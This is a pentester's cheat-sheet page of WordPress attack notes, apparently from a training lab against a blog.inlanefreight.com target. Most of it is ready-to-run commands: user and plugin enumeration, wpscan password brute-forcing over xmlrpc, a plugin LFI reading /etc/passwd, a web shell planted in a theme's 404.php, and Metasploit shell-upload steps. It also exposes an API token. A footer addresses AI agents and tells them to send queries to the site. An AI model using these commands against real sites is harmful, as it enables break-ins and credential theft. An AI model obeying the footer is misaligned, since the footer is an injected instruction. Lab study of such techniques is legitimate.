# Wordpress {% hint style="info" %} ```shell-session wpscan --password-attack xmlrpc -t 20 -U admin, david -P passwords.txt --url http://blog.inlanefreight.com ``` {% endhint %} ``` // discovering wp version curl -s -X GET http://blog.inlanefreight.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'wp-content/plugins/*' | cut -d"'" -f2 //via themes curl -s -X GET http://blog.inlanefreight.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'themes' | cut -d"'" -f2 // check user curl -s -I -X GET http://blog.inlanefreight.com/?author=1 // second method to enumerate users with json request curl http://blog.inlanefreight.com/wp-json/wp/v2/users | jq // valid creds curl -X POST -d "wp.getUsersBlogsadminCORRECT-PASSWORD" http://blog.inlanefreight.com/xmlrpc.php // get all methods for xmlrpc curl -i -s -k -X $'POST' -H $'Host: 138.68.163.76:32302' --data-binary $'\x0d\x0asystem.listMethods\x0d\x0a\x0d\x0a\x0d\x0a\x0d\x0a' 'http://138.68.163.76:32302/xmlrpc.php' | wc -l // wpscan enumeration wpscan --url http://blog.inlanefreight.com --enumerate --api-token Kffr4fdJzy9qVcTk // LFI to read passwd curl http://blog.inlanefreight.com:32302/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd // password attack wpscan --password-attack xmlrpc -t 20 -U admin, david -P passwords.txt // brute force password attack on xmlrpc wpscan --password-attack xmlrpc -t 20 -U roger -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.com:30594 //edit 404.php of the twentyseventeen theme // see that the active theme is Transportex so an unused theme // such as Twenty Seventeen should be chosen instead. // Choose a theme and click on Select. Next, choose a non-critical file // such as 404.php to modify and add a web shell. /wp-content/themes/twentyseventeen/404.php?cmd=id" //read the flag curl -X GET "http://blog.inlanefreight.com:30594/wp-content/themes/twentyseventeen/404.php?cmd=cat%20/home/wp-user/flag.txt" // MSF search wp_admin //wp_admin_shell_upload // use 0 // set rhosts blog.inlanefreight.com // set username admin // set password ... // set lhost x.x.x.x // run // identified vuln plugin // Email Subscribers & Newsletters < 4.2.3 - Multiple Issues https://wpscan.com/vulnerability/a0764617-6142-4ef7-94f9-1fb923e81e94 ``` ![](/files/dytdbmb7tgujpFDG3okS) ![](/files/l4urUg4GLNuqmmn6KOwe) ![](/files/dDgTsRWFOoxq73uw90ZN) ![](/files/pzIttrZ38cWJzE8kMPsj) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://livewire-za.gitbook.io/hacknotes/cbbh/wordpress.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.